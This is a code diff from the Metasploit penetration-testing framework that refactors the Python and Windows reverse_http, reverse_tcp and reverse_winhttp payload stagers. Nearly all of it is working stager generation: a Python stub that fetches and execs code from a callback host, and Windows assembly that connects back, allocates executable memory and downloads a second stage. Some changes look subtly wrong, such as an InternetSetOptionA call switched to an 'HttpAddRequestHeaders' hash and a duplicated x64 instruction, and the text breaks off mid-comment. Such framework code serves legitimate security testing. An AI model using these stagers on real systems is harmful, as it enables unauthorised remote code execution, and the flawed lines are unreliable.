Payload::Python::MeterpreterLoader end met.sub!("SESSION_GUID = \'\'", "SESSION_GUID = \'#{session_guid}\'") - http_user_agent = opts[:http_user_agent] || ds['MeterpreterUserAgent'] - http_proxy_host = opts[:http_proxy_host] || ds['PayloadProxyHost'] || ds['PROXYHOST'] - http_proxy_port = opts[:http_proxy_port] || ds['PayloadProxyPort'] || ds['PROXYPORT'] + http_user_agent = opts[:http_user_agent] || ds['HttpUserAgent'] + http_proxy_host = opts[:http_proxy_host] || ds['HttpProxyHost'] || ds['PROXYHOST'] + http_proxy_port = opts[:http_proxy_port] || ds['HttpProxyPort'] || ds['PROXYPORT'] + http_header_host = opts[:header_host] || ds['HttpHostHeader'] + http_header_cookie = opts[:header_cookie] || ds['HttpCookie'] + http_header_referer = opts[:header_referer] || ds['HttpReferer'] - # patch in the stageless http(s) connection url - met.sub!('HTTP_CONNECTION_URL = None', "HTTP_CONNECTION_URL = '#{var_escape.call(opts[:url])}'") if opts[:url].to_s != '' - met.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(http_user_agent)}'") if http_user_agent.to_s != '' + # The callback URL can be different to the one that we're receiving from the interface + # so we need to generate it + # TODO: move this to somewhere more common so that it can be used across payload types + unless opts[:url].to_s == '' + uri = "/#{opts[:url].split('/').reject(&:empty?)[-1]}" + callback_url = [ + opts[:url].to_s.split(':')[0], + '://', + (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLHOST'] : ds['LHOST']).to_s, + ':', + (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLPORT'] : ds['LPORT']).to_s, + ds['LURI'].to_s, + uri, + '/' + ].join('') - if http_proxy_host.to_s != '' - proxy_url = "http://#{http_proxy_host}:#{http_proxy_port}" - met.sub!('HTTP_PROXY = None', "HTTP_PROXY = '#{var_escape.call(proxy_url)}'") + # patch in the various payload related configuration + met.sub!('HTTP_CONNECTION_URL = None', "HTTP_CONNECTION_URL = '#{var_escape.call(callback_url)}'") + met.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(http_user_agent)}'") if http_user_agent.to_s != '' + met.sub!('HTTP_COOKIE = None', "HTTP_COOKIE = '#{var_escape.call(http_header_cookie)}'") if http_header_cookie.to_s != '' + met.sub!('HTTP_HOST = None', "HTTP_HOST = '#{var_escape.call(http_header_host)}'") if http_header_host.to_s != '' + met.sub!('HTTP_REFERER = None', "HTTP_REFERER = '#{var_escape.call(http_header_referer)}'") if http_header_referer.to_s != '' + + if http_proxy_host.to_s != '' + proxy_url = "http://#{http_proxy_host}:#{http_proxy_port}" + met.sub!('HTTP_PROXY = None', "HTTP_PROXY = '#{var_escape.call(proxy_url)}'") + end end # patch in any optional stageless tcp socket setup diff --git a/lib/msf/core/payload/python/reverse_http.rb b/lib/msf/core/payload/python/reverse_http.rb index 361ecb3c8e..f0981c9796 100644 --- a/lib/msf/core/payload/python/reverse_http.rb +++ b/lib/msf/core/payload/python/reverse_http.rb @@ -11,11 +11,10 @@ module Payload::Python::ReverseHttp def initialize(info = {}) super(info) - register_options( - [ - OptString.new('PayloadProxyHost', [ false, "The proxy server's IP address" ]), - OptPort.new('PayloadProxyPort', [ true, "The proxy port to connect to", 8080 ]) - ], self.class) + register_advanced_options( + Msf::Opt::http_header_options + + Msf::Opt::http_proxy_options + ) end # @@ -24,11 +23,14 @@ module Payload::Python::ReverseHttp def generate(opts={}) ds = opts[:datastore] || datastore opts.merge!({ - host: ds['LHOST'] || '127.127.127.127', - port: ds['LPORT'], - proxy_host: ds['PayloadProxyHost'], - proxy_port: ds['PayloadProxyPort'], - user_agent: ds['MeterpreterUserAgent'] + host: ds['LHOST'] || '127.127.127.127', + port: ds['LPORT'], + proxy_host: ds['HttpProxyHost'], + proxy_port: ds['HttpProxyPort'], + user_agent: ds['HttpUserAgent'], + header_host: ds['HttpHostHeader'], + header_cookie: ds['HttpCookie'], + header_referer: ds['HttpReferer'] }) opts[:scheme] = 'http' if opts[:scheme].nil? @@ -104,9 +106,18 @@ module Payload::Python::ReverseHttp cmd << "hs.append(ul.ProxyHandler({'#{opts[:scheme]}':'#{var_escape.call(proxy_url)}'}))\n" end + headers = [] + headers << "('User-Agent','#{var_escape.call(opts[:user_agent])}')" + headers << "('Cookie','#{var_escape.call(opts[:header_cookie])}')" if opts[:header_cookie] + headers << "('Referer','#{var_escape.call(opts[:header_referer])}')" if opts[:header_referer] + cmd << "o=ul.build_opener(*hs)\n" - cmd << "o.addheaders=[('User-Agent','#{var_escape.call(opts[:user_agent])}')]\n" - cmd << "exec(o.open('#{generate_callback_url(opts)}').read())\n" + cmd << "o.addheaders=[#{headers.join(',')}]\n" + if opts[:header_host] + cmd << "exec(o.open(ul.Request('#{generate_callback_url(opts)}',None,{'Host':'#{var_escape.call(opts[:header_host])}'})).read())\n" + else + cmd << "exec(o.open('#{generate_callback_url(opts)}').read())\n" + end py_create_exec_stub(cmd) end diff --git a/lib/msf/core/payload/python/reverse_tcp.rb b/lib/msf/core/payload/python/reverse_tcp.rb index 8369602654..77481ecbb3 100644 --- a/lib/msf/core/payload/python/reverse_tcp.rb +++ b/lib/msf/core/payload/python/reverse_tcp.rb @@ -18,11 +18,7 @@ module Payload::Python::ReverseTcp def initialize(*args) super - register_advanced_options([ - OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails', 10], - aliases: ['ReverseConnectRetries']), - OptInt.new('StagerRetryWait', [false, 'Number of seconds to wait for the stager between reconnect attempts', 5]) - ], self.class) + register_advanced_options(Msf::Opt::stager_retry_options) end # diff --git a/lib/msf/core/payload/python/reverse_tcp_ssl.rb b/lib/msf/core/payload/python/reverse_tcp_ssl.rb index ee65afe0ab..b1fcecdde7 100644 --- a/lib/msf/core/payload/python/reverse_tcp_ssl.rb +++ b/lib/msf/core/payload/python/reverse_tcp_ssl.rb @@ -17,11 +17,7 @@ module Payload::Python::ReverseTcpSsl include Msf::Payload::Python::ReverseTcp def initialize(*args) super - register_advanced_options([ - OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails', 10], - aliases: ['ReverseConnectRetries']), - OptInt.new('StagerRetryWait', [false, 'Number of seconds to wait for the stager between reconnect attempts', 5]) - ], self.class) + register_advanced_options(Msf::Opt::stager_retry_options) end # diff --git a/lib/msf/core/payload/transport_config.rb b/lib/msf/core/payload/transport_config.rb index c59c85577e..84e257bcce 100644 --- a/lib/msf/core/payload/transport_config.rb +++ b/lib/msf/core/payload/transport_config.rb @@ -56,16 +56,20 @@ module Msf::Payload::TransportConfig ds = opts[:datastore] || datastore { - scheme: ds['OverrideScheme'] || 'http', - lhost: opts[:lhost] || ds['LHOST'], - lport: (opts[:lport] || ds['LPORT']).to_i, - uri: uri, - ua: ds['MeterpreterUserAgent'], - proxy_host: ds['PayloadProxyHost'], - proxy_port: ds['PayloadProxyPort'], - proxy_type: ds['PayloadProxyType'], - proxy_user: ds['PayloadProxyUser'], - proxy_pass: ds['PayloadProxyPass'] + scheme: ds['OverrideScheme'] || 'http', + lhost: opts[:lhost] || ds['LHOST'], + lport: (opts[:lport] || ds['LPORT']).to_i, + uri: uri, + ua: ds['HttpUserAgent'], + proxy_host: ds['HttpProxyHost'], + proxy_port: ds['HttpProxyPort'], + proxy_type: ds['HttpProxyType'], + proxy_user: ds['HttpProxyUser'], + proxy_pass: ds['HttpProxyPass'], + host: ds['HttpHostHeader'], + cookie: ds['HttpCookie'], + referer: ds['HttpReferer'], + custom_headers: get_custom_headers(ds) }.merge(timeout_config(opts)) end @@ -80,6 +84,19 @@ module Msf::Payload::TransportConfig private + def get_custom_headers(ds) + headers = "" + headers << "Host: #{ds['HttpHostHeader']}\r\n" if ds['HttpHostHeader'] + headers << "Cookie: #{ds['HttpCookie']}\r\n" if ds['HttpCookie'] + headers << "Referer: #{ds['HttpReferer']}\r\n" if ds['HttpReferer'] + + if headers.length > 0 + headers + else + nil + end + end + def timeout_config(opts={}) ds = opts[:datastore] || datastore { diff --git a/lib/msf/core/payload/uuid.rb b/lib/msf/core/payload/uuid.rb index acc100406a..f510c88469 100644 --- a/lib/msf/core/payload/uuid.rb +++ b/lib/msf/core/payload/uuid.rb @@ -43,7 +43,8 @@ class Msf::Payload::UUID 24 => ARCH_AARCH64, 25 => ARCH_MIPS64, 26 => ARCH_PPC64LE, - 27 => ARCH_R + 27 => ARCH_R, + 28 => ARCH_PPCE500V2 } Platforms = { @@ -253,6 +254,10 @@ class Msf::Payload::UUID self.xor1 = opts[:xor1] self.xor2 = opts[:xor2] + self.timestamp = nil + self.name = nil + self.registered = false + if opts[:seed] self.puid = self.class.seed_to_puid(opts[:seed]) end @@ -366,6 +371,10 @@ class Msf::Payload::UUID self end + attr_accessor :registered + attr_accessor :timestamp + attr_accessor :name + attr_reader :arch attr_reader :platform diff --git a/lib/msf/core/payload/windows/reverse_http.rb b/lib/msf/core/payload/windows/reverse_http.rb index 1c9b79b562..db89b7138d 100644 --- a/lib/msf/core/payload/windows/reverse_http.rb +++ b/lib/msf/core/payload/windows/reverse_http.rb @@ -27,17 +27,12 @@ module Payload::Windows::ReverseHttp # def initialize(*args) super - register_advanced_options([ - OptInt.new('StagerURILength', [false, 'The URI length for the stager (at least 5 bytes)']), - OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails', 10], - aliases: ['ReverseConnectRetries']), - OptInt.new('StagerRetryWait', [false, 'Number of seconds to wait for the stager between reconnect attempts', 5]), - OptString.new('PayloadProxyHost', [false, 'An optional proxy server IP address or hostname']), - OptPort.new('PayloadProxyPort', [false, 'An optional proxy server port']), - OptString.new('PayloadProxyUser', [false, 'An optional proxy server username']), - OptString.new('PayloadProxyPass', [false, 'An optional proxy server password']), - OptEnum.new('PayloadProxyType', [false, 'The type of HTTP proxy (HTTP or SOCKS)', 'HTTP', ['HTTP', 'SOCKS']]) - ], self.class) + register_advanced_options( + [ OptInt.new('StagerURILength', 'The URI length for the stager (at least 5 bytes)') ] + + Msf::Opt::stager_retry_options + + Msf::Opt::http_header_options + + Msf::Opt::http_proxy_options + ) end # @@ -47,22 +42,23 @@ module Payload::Windows::ReverseHttp ds = opts[:datastore] || datastore conf = { ssl: opts[:ssl] || false, - host: ds['LHOST'], + host: ds['LHOST'] || '127.127.127.127', port: ds['LPORT'], retry_count: ds['StagerRetryCount'], - retry_wait: ds['StagerRetryWait'] + retry_wait: ds['StagerRetryWait'] } # Add extra options if we have enough space - if self.available_space && required_space <= self.available_space - conf[:url] = luri + generate_uri(opts) - conf[:exitfunk] = ds['EXITFUNC'] - conf[:ua] = ds['MeterpreterUserAgent'] - conf[:proxy_host] = ds['PayloadProxyHost'] - conf[:proxy_port] = ds['PayloadProxyPort'] - conf[:proxy_user] = ds['PayloadProxyUser'] - conf[:proxy_pass] = ds['PayloadProxyPass'] - conf[:proxy_type] = ds['PayloadProxyType'] + if self.available_space.nil? || required_space <= self.available_space + conf[:url] = luri + generate_uri(opts) + conf[:exitfunk] = ds['EXITFUNC'] + conf[:ua] = ds['HttpUserAgent'] + conf[:proxy_host] = ds['HttpProxyHost'] + conf[:proxy_port] = ds['HttpProxyPort'] + conf[:proxy_user] = ds['HttpProxyUser'] + conf[:proxy_pass] = ds['HttpProxyPass'] + conf[:proxy_type] = ds['HttpProxyType'] + conf[:custom_headers] = get_custom_headers(ds) else # Otherwise default to small URIs conf[:url] = luri + generate_small_uri @@ -71,6 +67,22 @@ module Payload::Windows::ReverseHttp generate_reverse_http(conf) end + # + # Generate the custom headers string + # + def get_custom_headers(ds) + headers = "" + headers << "Host: #{ds['HttpHostHeader']}\r\n" if ds['HttpHostHeader'] + headers << "Cookie: #{ds['HttpCookie']}\r\n" if ds['HttpCookie'] + headers << "Referer: #{ds['HttpReferer']}\r\n" if ds['HttpReferer'] + + if headers.length > 0 + headers + else + nil + end + end + # # Generate and compile the stager # @@ -138,10 +150,23 @@ module Payload::Windows::ReverseHttp # Proxy options? space += 200 + # Custom headers? Ugh, impossible to tell + space += 512 + # The final estimated size space end + # + # Convert a string into a NULL-terminated ASCII byte array + # + def asm_generate_ascii_array(str) + (str.to_s + "\x00"). + unpack("C*"). + map{ |c| "0x%.2x" % c }. + join(",") + end + # # Generate an assembly stub with the configured feature set and options. # @@ -155,6 +180,7 @@ module Payload::Windows::ReverseHttp # @option opts [String] :proxy_type The optional proxy server type, one of HTTP or SOCKS # @option opts [String] :proxy_user The optional proxy server username # @option opts [String] :proxy_pass The optional proxy server password + # @option opts [String] :custom_headers The optional collection of custom headers for the payload. # @option opts [Integer] :retry_count The number of times to retry a failed request before giving up # @option opts [Integer] :retry_wait The seconds to wait before retry a new request # @@ -181,6 +207,8 @@ module Payload::Windows::ReverseHttp proxy_user = opts[:proxy_user].to_s.length == 0 ? nil : opts[:proxy_user] proxy_pass = opts[:proxy_pass].to_s.length == 0 ? nil : opts[:proxy_pass] + custom_headers = opts[:custom_headers].to_s.length == 0 ? nil : asm_generate_ascii_array(opts[:custom_headers]) + http_open_flags = 0 secure_flags = 0 @@ -222,10 +250,10 @@ module Payload::Windows::ReverseHttp push 0x0074656e ; Push the bytes 'wininet',0 onto the stack. push 0x696e6977 ; ... push esp ; Push a pointer to the "wininet" string on the stack. - push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" ) + push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} call ebp ; LoadLibraryA( "wininet" ) xor ebx, ebx ; Set ebx to NULL to use in future arguments - ^ + ^ if proxy_enabled asm << %Q^ @@ -238,7 +266,7 @@ module Payload::Windows::ReverseHttp ; LPCTSTR lpszProxyName (via call) push 3 ; DWORD dwAccessType (INTERNET_OPEN_TYPE_PROXY = 3) push ebx ; LPCTSTR lpszAgent (NULL) - push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')} call ebp ^ else @@ -249,7 +277,7 @@ module Payload::Windows::ReverseHttp push ebx ; LPCTSTR lpszProxyName (NULL) push ebx ; DWORD dwAccessType (PRECONFIG = 0) push ebx ; LPCTSTR lpszAgent (NULL) - push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')} call ebp ^ end @@ -267,10 +295,10 @@ module Payload::Windows::ReverseHttp db "#{opts[:url]}", 0x00 got_server_host: push eax ; HINTERNET hInternet (still in eax from InternetOpenA) - push 0xC69F8957 ; hash( "wininet.dll", "InternetConnectA" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'InternetConnectA')} call ebp mov esi, eax ; Store hConnection in esi - ^ + ^ # Note: wine-1.6.2 does not support SSL w/proxy authentication properly, it # doesn't set the Proxy-Authorization header on the CONNECT request. @@ -286,7 +314,7 @@ module Payload::Windows::ReverseHttp ; LPVOID lpBuffer (username from previous call) push 43 ; DWORD dwOption (INTERNET_OPTION_PROXY_USERNAME) push esi ; hConnection - push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')} call ebp ^ end @@ -302,7 +330,7 @@ module Payload::Windows::ReverseHttp ; LPVOID lpBuffer (password from previous call) push 44 ; DWORD dwOption (INTERNET_OPTION_PROXY_PASSWORD) push esi ; hConnection - push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'HttpAddRequestHeaders')} call ebp ^ end @@ -317,7 +345,7 @@ module Payload::Windows::ReverseHttp push edi ; server URI push ebx ; method push esi ; hConnection - push 0x3B2E55EB ; hash( "wininet.dll", "HttpOpenRequestA" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'HttpOpenRequestA')} call ebp xchg esi, eax ; save hHttpRequest in esi ^ @@ -334,7 +362,6 @@ module Payload::Windows::ReverseHttp send_request: ^ - if opts[:ssl] asm << %Q^ ; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) ); @@ -345,7 +372,7 @@ module Payload::Windows::ReverseHttp push eax ; &dwFlags push 31 ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS) push esi ; hHttpRequest - push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')} call ebp ^ end @@ -354,17 +381,32 @@ module Payload::Windows::ReverseHttp httpsendrequest: push ebx ; lpOptional length (0) push ebx ; lpOptional (NULL) - push ebx ; dwHeadersLength (0) - push ebx ; lpszHeaders (NULL) + ^ + + if custom_headers + asm << %Q^ + push -1 ; dwHeadersLength (assume NULL terminated) + call get_req_headers ; lpszHeaders (pointer to the custom headers) + db #{custom_headers} + get_req_headers: + ^ + else + asm << %Q^ + push ebx ; HeadersLength (0) + push ebx ; Headers (NULL) + ^ + end + + asm << %Q^ push esi ; hHttpRequest - push 0x7B18062D ; hash( "wininet.dll", "HttpSendRequestA" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'HttpSendRequestA')} call ebp test eax,eax jnz allocate_memory set_wait: push #{retry_wait} ; dwMilliseconds - push 0xE035F044 ; hash( "kernel32.dll", "Sleep" ) + push #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')} call ebp ; Sleep( dwMilliseconds ); ^ @@ -404,7 +446,7 @@ module Payload::Windows::ReverseHttp push 0x1000 ; MEM_COMMIT push 0x00400000 ; Stage allocation (4Mb ought to do us) push ebx ; NULL as we dont care where the allocation is - push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" ) + push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); download_prep: @@ -418,7 +460,7 @@ module Payload::Windows::ReverseHttp push 8192 ; read length push ebx ; buffer push esi ; hRequest - push 0xE2899612 ; hash( "wininet.dll", "InternetReadFile" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')} call ebp test eax,eax ; download failed? (optional?) diff --git a/lib/msf/core/payload/windows/reverse_winhttp.rb b/lib/msf/core/payload/windows/reverse_winhttp.rb index c6f1eb838b..380a3141da 100644 --- a/lib/msf/core/payload/windows/reverse_winhttp.rb +++ b/lib/msf/core/payload/windows/reverse_winhttp.rb @@ -21,7 +21,7 @@ module Payload::Windows::ReverseWinHttp def initialize(*args) super register_advanced_options([ - OptBool.new('PayloadProxyIE', [false, 'Enable use of IE proxy settings', true]) + OptBool.new('HttpProxyIE', 'Enable use of IE proxy settings', default: true, aliases: ['PayloadProxyIE']) ], self.class) end @@ -29,24 +29,26 @@ module Payload::Windows::ReverseWinHttp # Generate the first stage # def generate(opts={}) + ds = opts[:datastore] || datastore conf = { - ssl: opts[:ssl] || false, - host: datastore['LHOST'] || '127.127.127.127', - port: datastore['LPORT'] + ssl: opts[:ssl] || false, + host: ds['LHOST'] || '127.127.127.127', + port: ds['LPORT'] } # Add extra options if we have enough space - if self.available_space && required_space <= self.available_space + if self.available_space.nil? || required_space <= self.available_space conf[:uri] = luri + generate_uri - conf[:exitfunk] = datastore['EXITFUNC'] + conf[:exitfunk] = ds['EXITFUNC'] conf[:verify_cert_hash] = opts[:verify_cert_hash] - conf[:proxy_host] = datastore['PayloadProxyHost'] - conf[:proxy_port] = datastore['PayloadProxyPort'] - conf[:proxy_user] = datastore['PayloadProxyUser'] - conf[:proxy_pass] = datastore['PayloadProxyPass'] - conf[:proxy_type] = datastore['PayloadProxyType'] - conf[:retry_count] = datastore['StagerRetryCount'] - conf[:proxy_ie] = datastore['PayloadProxyIE'] + conf[:proxy_host] = ds['HttpProxyHost'] + conf[:proxy_port] = ds['HttpProxyPort'] + conf[:proxy_user] = ds['HttpProxyUser'] + conf[:proxy_pass] = ds['HttpProxyPass'] + conf[:proxy_type] = ds['HttpProxyType'] + conf[:retry_count] = ds['StagerRetryCount'] + conf[:proxy_ie] = ds['HttpProxyIE'] + conf[:custom_headers] = get_custom_headers(ds) else # Otherwise default to small URIs conf[:uri] = luri + generate_small_uri @@ -93,6 +95,9 @@ module Payload::Windows::ReverseWinHttp # EXITFUNK processing adds 31 bytes at most (for ExitThread, only ~16 for others) space += 31 + # Custom headers? Ugh, impossible to tell + space += 512 * 2 + # The final estimated size space end @@ -167,6 +172,8 @@ module Payload::Windows::ReverseWinHttp proxy_user = opts[:proxy_user].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:proxy_user]) proxy_pass = opts[:proxy_pass].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:proxy_pass]) + custom_headers = opts[:custom_headers].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:custom_headers]) + http_open_flags = 0 secure_flags = 0 @@ -434,8 +441,23 @@ module Payload::Windows::ReverseWinHttp push ebx ; TotalLength [6] push ebx ; OptionalLength (0) [5] push ebx ; Optional (NULL) [4] + ^ + + if custom_headers + asm << %Q^ + push -1 ; dwHeadersLength (assume NULL terminated) [3] + call get_req_headers ; lpszHeaders (pointer to the custom headers) [2] + db #{custom_headers} + get_req_headers: + ^ + else + asm << %Q^ push ebx ; HeadersLength (0) [3] push ebx ; Headers (NULL) [2] + ^ + end + + asm << %Q^ push esi ; HttpRequest handle returned by WinHttpOpenRequest [1] push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSendRequest')} call ebp diff --git a/lib/msf/core/payload/windows/x64/reverse_http.rb b/lib/msf/core/payload/windows/x64/reverse_http.rb index a9048731b4..d42d3497f2 100644 --- a/lib/msf/core/payload/windows/x64/reverse_http.rb +++ b/lib/msf/core/payload/windows/x64/reverse_http.rb @@ -27,17 +27,12 @@ module Payload::Windows::ReverseHttp_x64 # def initialize(*args) super - register_advanced_options([ - OptInt.new('StagerURILength', [false, 'The URI length for the stager (at least 5 bytes)']), - OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails', 10], - aliases: ['ReverseConnectRetries']), - OptInt.new('StagerRetryWait', [false, 'Number of seconds to wait for the stager between reconnect attempts', 5]), - OptString.new('PayloadProxyHost', [false, 'An optional proxy server IP address or hostname']), - OptPort.new('PayloadProxyPort', [false, 'An optional proxy server port']), - OptString.new('PayloadProxyUser', [false, 'An optional proxy server username']), - OptString.new('PayloadProxyPass', [false, 'An optional proxy server password']), - OptEnum.new('PayloadProxyType', [false, 'The type of HTTP proxy (HTTP or SOCKS)', 'HTTP', ['HTTP', 'SOCKS']]) - ], self.class) + register_advanced_options( + [ OptInt.new('StagerURILength', 'The URI length for the stager (at least 5 bytes)') ] + + Msf::Opt::stager_retry_options + + Msf::Opt::http_header_options + + Msf::Opt::http_proxy_options + ) end def transport_config(opts={}) @@ -52,22 +47,23 @@ module Payload::Windows::ReverseHttp_x64 conf = { ssl: opts[:ssl] || false, - host: ds['LHOST'], + host: ds['LHOST'] || '127.127.127.127', port: ds['LPORT'], retry_count: ds['StagerRetryCount'], - retry_wait: ds['StagerRetryWait'] + retry_wait: ds['StagerRetryWait'] } # add extended options if we do have enough space - if self.available_space && required_space <= self.available_space + if self.available_space.nil? || required_space <= self.available_space conf[:url] = luri + generate_uri(opts) conf[:exitfunk] = ds['EXITFUNC'] - conf[:ua] = ds['MeterpreterUserAgent'] - conf[:proxy_host] = ds['PayloadProxyHost'] - conf[:proxy_port] = ds['PayloadProxyPort'] - conf[:proxy_user] = ds['PayloadProxyUser'] - conf[:proxy_pass] = ds['PayloadProxyPass'] - conf[:proxy_type] = ds['PayloadProxyType'] + conf[:ua] = ds['HttpUserAgent'] + conf[:proxy_host] = ds['HttpProxyHost'] + conf[:proxy_port] = ds['HttpProxyPort'] + conf[:proxy_user] = ds['HttpProxyUser'] + conf[:proxy_pass] = ds['HttpProxyPass'] + conf[:proxy_type] = ds['HttpProxyType'] + conf[:custom_headers] = get_custom_headers(ds) else # Otherwise default to small URIs conf[:url] = luri + generate_small_uri @@ -76,6 +72,22 @@ module Payload::Windows::ReverseHttp_x64 generate_reverse_http(conf) end + # + # Generate the custom headers string + # + def get_custom_headers(ds) + headers = "" + headers << "Host: #{ds['HttpHostHeader']}\r\n" if ds['HttpHostHeader'] + headers << "Cookie: #{ds['HttpCookie']}\r\n" if ds['HttpCookie'] + headers << "Referer: #{ds['HttpReferer']}\r\n" if ds['HttpReferer'] + + if headers.length > 0 + headers + else + nil + end + end + # # Generate and compile the stager # @@ -89,6 +101,7 @@ module Payload::Windows::ReverseHttp_x64 pop rbp ; rbp now contains the block API pointer #{asm_reverse_http(opts)} ^ + Metasm::Shellcode.assemble(Metasm::X64.new, combined_asm).encode_string end @@ -137,10 +150,23 @@ module Payload::Windows::ReverseHttp_x64 # Proxy options? space += 200 + # Custom headers? Ugh, impossible to tell + space += 512 + # The final estimated size space end + # + # Convert a string into a NULL-terminated ASCII byte array + # + def asm_generate_ascii_array(str) + (str.to_s + "\x00"). + unpack("C*"). + map{ |c| "0x%.2x" % c }. + join(",") + end + # # Generate an assembly stub with the configured feature set and options. # @@ -154,6 +180,7 @@ module Payload::Windows::ReverseHttp_x64 # @option opts [String] :proxy_type The optional proxy server type, one of HTTP or SOCKS # @option opts [String] :proxy_user The optional proxy server username # @option opts [String] :proxy_pass The optional proxy server password + # @option opts [String] :custom_headers The optional collection of custom headers for the payload. # @option opts [Integer] :retry_count The number of times to retry a failed request before giving up # @option opts [Integer] :retry_wait The seconds to wait before retry a new request # @@ -180,6 +207,8 @@ module Payload::Windows::ReverseHttp_x64 proxy_user = opts[:proxy_user].to_s.length == 0 ? nil : opts[:proxy_user] proxy_pass = opts[:proxy_pass].to_s.length == 0 ? nil : opts[:proxy_pass] + custom_headers = opts[:custom_headers].to_s.length == 0 ? nil : asm_generate_ascii_array(opts[:custom_headers]) + http_open_flags = 0 set_option_flags = 0 @@ -327,17 +356,15 @@ module Payload::Windows::ReverseHttp_x64 if retry_count > 0 asm << %Q^ - push #{retry_count} - pop rdi + push #{retry_count} + pop rdi ^ end - asm << %Q^ retryrequest: ^ - if opts[:ssl] asm << %Q^ internetsetoption: @@ -351,15 +378,30 @@ module Payload::Windows::ReverseHttp_x64 pop r9 ; dwBufferLength (4 = size of flags) mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')} call rbp + + xor r8, r8 ; dwHeadersLen (0) ^ end - asm << %Q^ - httpsendrequest: - mov rcx, rsi ; hRequest (request handle) + if custom_headers + asm << %Q^ + call get_req_headers ; lpszHeaders (pointer to the custom headers) + db #{custom_headers} + get_req_headers: + pop rdx ; lpszHeaders + dec r8 ; dwHeadersLength (assume NULL terminated) + ^ + else + asm << %Q^ push rbx pop rdx ; lpszHeaders (NULL) - xor r8, r8 ; dwHeadersLen (0) + ^ + end + + + asm << %Q^ + mov rcx, rsi ; hRequest (request handle) + xor r9, r9 ; lpszVersion (NULL) xor r9, r9 ; lpszVersion (NULL) push rbx ; stack alignment push rbx ; dwOptionalLength (0) diff --git a/lib/msf/core/payload/windows/x64/reverse_winhttp.rb b/lib/msf/core/payload/windows/x64/reverse_winhttp.rb index 7ba6de3b35..419946be1e 100644 --- a/lib/msf/core/payload/windows/x64/reverse_winhttp.rb +++ b/lib/msf/core/payload/windows/x64/reverse_winhttp.rb @@ -22,7 +22,7 @@ module Payload::Windows::ReverseWinHttp_x64 def initialize(*args) super register_advanced_options([ - OptBool.new('PayloadProxyIE', [false, 'Enable use of IE proxy settings', true]) + OptBool.new('HttpProxyIE', 'Enable use of IE proxy settings', default: true, aliases: ['PayloadProxyIE']) ], self.class) end @@ -30,24 +30,26 @@ module Payload::Windows::ReverseWinHttp_x64 # Generate the first stage # def generate(opts={}) + ds = opts[:datastore] || datastore conf = { - ssl: opts[:ssl] || false, - host: datastore['LHOST'] || '127.127.127.127', - port: datastore['LPORT'] + ssl: opts[:ssl] || false, + host: ds['LHOST'] || '127.127.127.127', + port: ds['LPORT'] } # Add extra options if we have enough space - if self.available_space && required_space <= self.available_space + if self.available_space.nil? || required_space <= self.available_space conf[:uri] = luri + generate_uri - conf[:exitfunk] = datastore['EXITFUNC'] + conf[:exitfunk] = ds['EXITFUNC'] conf[:verify_cert_hash] = opts[:verify_cert_hash] - conf[:proxy_host] = datastore['PayloadProxyHost'] - conf[:proxy_port] = datastore['PayloadProxyPort'] - conf[:proxy_user] = datastore['PayloadProxyUser'] - conf[:proxy_pass] = datastore['PayloadProxyPass'] - conf[:proxy_type] = datastore['PayloadProxyType'] - conf[:retry_count] = datastore['StagerRetryCount'] - conf[:proxy_ie] = datastore['PayloadProxyIE'] + conf[:proxy_host] = ds['HttpProxyHost'] + conf[:proxy_port] = ds['HttpProxyPort'] + conf[:proxy_user] = ds['HttpProxyUser'] + conf[:proxy_pass] = ds['HttpProxyPass'] + conf[:proxy_type] = ds['HttpProxyType'] + conf[:retry_count] = ds['StagerRetryCount'] + conf[:proxy_ie] = ds['HttpProxyIE'] + conf[:custom_headers] = get_custom_headers(ds) else # Otherwise default to small URIs conf[:uri] = luri + generate_small_uri @@ -95,6 +97,9 @@ module Payload::Windows::ReverseWinHttp_x64 # EXITFUNK processing adds 31 bytes at most (for ExitThread, only ~16 for others) space += 31 + # Custom headers? Ugh, impossible to tell + space += 512 + # The final estimated size space end @@ -115,12 +120,18 @@ module Payload::Windows::ReverseWinHttp_x64 # Generate an assembly stub with the configured feature set and options. # # @option opts [Bool] :ssl Whether or not to enable SSL - # @option opts [String] :uri The URI to request during staging + # @option opts [String] :url The URI to request during staging # @option opts [String] :host The host to connect to # @option opts [Integer] :port The port to connect to - # @option opts [String] :verify_cert_hash A 20-byte raw SHA-1 hash of the certificate to verify, or nil # @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh + # @option opts [String] 